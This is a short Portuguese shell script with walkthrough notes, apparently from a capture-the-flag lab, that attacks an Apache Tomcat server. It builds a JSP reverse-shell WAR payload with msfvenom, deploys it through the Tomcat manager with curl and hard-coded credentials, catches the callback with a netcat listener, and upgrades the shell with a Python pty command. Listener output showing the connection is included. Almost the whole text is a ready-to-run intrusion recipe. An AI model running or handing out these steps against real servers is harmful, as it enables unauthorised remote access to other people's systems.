sh_MSFvenom

echo "-------------------------------------CRIANDO UM EXPLOID COM MSFVENOM----------------------------------------------------"




msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.29 LPORT=4444 -f war > exploit.war

#IP do seu local host + porta
#Criação do arquivo .WAR



echo "-------------------------------------UPLOAD DO EXPLOIT NO ALVO---------------------------------------------------------"







curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://10.10.10.194:8080/manager/text/deploy?path=/exploit.war"


#O ataque foi em um alvo cujo tomcat9 estava vulneravel

#IP do RHOST(alvo) + porta da aplicação

#upload do arquivo .war





echo "------------------------------------sucesso no upload -----------------------------------------------------"








echo "-----------------------------------Se conectando ao netcat---------------------------------------------------------"









echo "----------------------------------- http://10.10.10.194:8080/exploit.war  ---------------------------------------------"
nc -nvlp 4444

#em outra aba do terminal, deixe escutando na porta que desejar 
# nc -nvlp 4444

Quando estiver ouvindo a porta, vá no navegador e acesse o arquivo que você acabou de fazer o upload:

http://10.10.10.194:8080/exploit.war/

Volte ao terminal — ele terá conectado via shell. Agora execute o shell reverso em Python para obter um terminal interativo:

listening on [any] 4444 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.194] 50476
python3 -c "import pty;pty.spawn('/bin/bash')"